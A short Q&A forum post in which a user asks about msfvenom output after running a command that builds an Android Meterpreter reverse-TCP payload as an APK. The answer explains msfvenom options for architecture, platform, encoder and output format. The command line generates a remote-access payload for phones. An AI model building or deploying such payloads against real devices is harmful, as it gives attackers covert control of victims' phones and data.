# I create payload using msfvenom but below error generated

Tags: android

My command is:

```
./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 -o > ~/storage/itechhacks.apk
```

But it wants below details:

> [-] No platform was selected, choosing Msf::Module::Platform::Android
>   from the payload [-] No arch selected, selecting arch: dalvik from the
>   payload No encoder or badchars specified, outputting raw payload
>   Payload size: 10075 bytes

Answer (score 0):

You can specify an architecture with -a or --arch, a platform with --platform, encoder with -e and badchars with -b.

You get more help with --help or -h

To list available arch, encoders... etc use --list arch, --list encoders ...etc

And you may want to specify the format with -f to get a .apk file and don't use > with -o

Depending on the msfvenom version the commands may differ slightly, use -h or --help to get the right syntax.

Here is a good description of msfvenom: https://www.offensive-security.com/metasploit-unleashed/Msfvenom/